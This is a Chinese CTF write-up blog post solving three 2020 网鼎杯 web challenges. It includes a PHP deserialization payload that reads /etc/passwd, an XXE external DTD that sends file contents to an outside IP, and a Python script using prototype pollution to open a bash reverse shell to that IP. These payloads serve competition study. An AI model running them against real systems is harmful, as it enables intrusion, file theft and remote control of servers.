网鼎杯 2020(青龙)
2020-05-12 19:05:00
ctf - wp - 网鼎
再次吐槽一个队伍只能开一个容器,大早上起来迟迟不放web题。
AreUSerialz
反序列化利用,给出源码:
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}很简单,就一个弱类型比较,让op为数字2可以绕过__destruct里的强类型比较,$filename直接为要读的文件,这里有一个点就是需要绕过is_valid,但我们反序列化的对象里会有protected类型的属性,在反序列化时会产生<0x00>*<0x00>,也就是%00,其ascii为0,是无法通过is_valid。
p神在小密圈内曾经发过一个点就是在反序列化时,将s改为S,此时后面的字符串支持16进制表示,因此我们的0x00就可以改写为\00,因为在is_valid中是将我们序列化后的字符串逐个转为ascii然后进行对比,而因此\00会被解析为三个字符,且都在允许的范围内,因此可以成功绕过。
生成payload:
<?php
class FileHandler {
protected $op = 2;
protected $filename = "/etc/passwd";
protected $content;
}
$a = new FileHandler("");
$s = serialize($a);
$b = str_replace("\00",'\00',$s);
echo str_replace("s:",'S:',$b);至于为什么当时我直接使用相对路径读不到也是一个很迷的点,因为环境不一样,事后在buu上是可以直接读到的,不太清楚问题出在哪,后面也就是各种fuzz找到flag位置了。
这道题因为出题人的php版本较高,前面的绕过还可以用php7.2+的黑魔法,public属性直接反序列化就能用了。
FileJava
存在任意文件下载,上传文件时让它报错可以获取到web服务的路径:
照着先把web.xml读下来:
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>把源码扒下来之后用jd-gui反编译。
发现源码在处理xlsx会导致xxe,参考:Apache-Poi-XXE-Analysis
修改 excel 文件中的 [Content_Types].xml 、 /xl/workbook.xml 、 /xl/worksheets/shee1.xml 中均可添加 xxepayload 触发漏洞。
这边随便新建个xlsx解压出来后改下[Content_Types].xml。
<!ENTITY % remote SYSTEM 'http://101.132.132.179:Port/xxe.dtd'>dtd:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % hhh "<!ENTITY % send SYSTEM 'http://101.132.132.179:anoPort/?q=%file;'>">
%hhh;
%send;
因为规定了文件开头必须为excel-,当时在这里卡住了,然后gq师傅直接做了出来,后面复现的时候才看到。
notes
var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');
var app = express();
class Notes {
constructor() {
this.owner = "whoknows";
this.num = 0;
this.note_list = {};
}
write_note(author, raw_note) {
this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
}
get_note(id) {
var r = {}
undefsafe(r, id, undefsafe(this.note_list, id));
return r;
}
edit_note(id, author, raw) {
undefsafe(this.note_list, id + '.author', author);
undefsafe(this.note_list, id + '.raw_note', raw);
}
get_all_notes() {
return this.note_list;
}
remove_note(id) {
delete this.note_list[id];
}
}
var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));
app.get('/', function(req, res, next) {
res.render('index', { title: 'Notebook' });
});
app.route('/add_note')
.get(function(req, res) {
res.render('mess', {message: 'please use POST to add a note'});
})
.post(function(req, res) {
let author = req.body.author;
let raw = req.body.raw;
if (author && raw) {
notes.write_note(author, raw);
res.render('mess', {message: "add note sucess"});
} else {
res.render('mess', {message: "did not add note"});
}
})
app.route('/edit_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to edit a note"});
})
.post(function(req, res) {
let id = req.body.id;
let author = req.body.author;
let enote = req.body.raw;
if (id && author && enote) {
notes.edit_note(id, author, enote);
res.render('mess', {message: "edit note sucess"});
} else {
res.render('mess', {message: "edit note failed"});
}
})
app.route('/delete_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to delete a note"});
})
.post(function(req, res) {
let id = req.body.id;
if (id) {
notes.remove_note(id);
res.render('mess', {message: "delete done"});
} else {
res.render('mess', {message: "delete failed"});
}
})
app.route('/notes')
.get(function(req, res) {
let q = req.query.q;
let a_note;
if (typeof(q) === "undefined") {
a_note = notes.get_all_notes();
} else {
a_note = notes.get_note(q);
}
res.render('note', {list: a_note});
})
app.route('/status')
.get(function(req, res) {
let commands = {
"script-1": "uptime",
"script-2": "free -m"
};
for (let index in commands) {
exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
if (err) {
return;
}
console.log(`stdout: ${stdout}`);
});
}
res.send('OK');
res.end();
})
app.use(function(req, res, next) {
res.status(404).send('Sorry cant find that!');
});
app.use(function(err, req, res, next) {
console.error(err.stack);
res.status(500).send('Something broke!');
});
const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))其poc为:
var a = require("undefsafe");
var payload = "__proto__.toString";
a({},payload,"JHU");
console.log({}.toString);可知是一个可以污染第一个传入的参数的原型链,寻找类似poc的代码段:
edit_note(id, author, raw) {
undefsafe(this.note_list, id + '.author', author);
undefsafe(this.note_list, id + '.raw_note', raw);
}
app.route('/edit_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to edit a note"});
})
.post(function(req, res) {
let id = req.body.id;
let author = req.body.author;
let enote = req.body.raw;
if (id && author && enote) {
notes.edit_note(id, author, enote);
res.render('mess', {message: "edit note sucess"});
} else {
res.render('mess', {message: "edit note failed"});
}
})note_list是一个字典,找下发现status处有个字典commands:
app.route('/status')
.get(function(req, res) {
let commands = {
"script-1": "uptime",
"script-2": "free -m"
};
for (let index in commands) {
exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
if (err) {
return;
}
console.log(`stdout: ${stdout}`);
});
}
res.send('OK');
res.end();
})那么置id为__proto__,因为会写两次,那么author或者raw都可以是我们要执行的命令,之后访问一遍status就可以了。
因为没回显,这边弹个shell。
#-*- coding:utf-8 -*-
#__author__: HhhM
import requests
import json
import re
print("Start the program:")
url = "http://xxx/edit_note/"
headers = {"Content-Type": "application/json"}
id = "__proto__"
author = "bash -i >& /dev/tcp/101.132.132.179/port 0>&1"
raw = "123"
data = json.dumps({'id': id, "author": author, "raw": raw})
r = requests.post(url, headers=headers, data=data)
print(r.text)flag就在根目录下。
本文原创于HhhM的博客,转载请标明出处。
近期动态
2021年1月1日 18:08
元旦快乐
一个web狗的博客
程序猿 CTFer Python Java Php 努力学习ing!!!
标签云
二叉树 算法 java 沙箱逃逸 python ctf sql 国赛强网杯 wp 省赛强网杯 flask ssrf sqlite roar 海啸杯 红帽杯 代码审计 php 反序列化 thinkphp phar 图床 lsb加密 取证分析 session 文件操作 注解 反射 servlet web BJDCTF mrctf Midnight TG:Hack HackZone bbctf hfctf 安恒 De1CTF 网鼎 GKCTF 渗透 PHPMailer SUID UDF DozerCTF cs 域渗透 dasctf 3kctf wmctf 特性 nodejs ciscn qwb 羊城杯 西湖论剑 appsec_il 漏洞学习 redis 祥云杯 备忘 蚁剑 编码器 bypass disable function 纵横杯 hws
_ _ _ _ ___ ___
| | | | | | | | \/ |
| |_| | |__ | |__ | . . |
| _ | '_ \| '_ \| |\/| |
| | | | | | | | | | | | |
\_| |_/_| |_|_| |_\_| |_/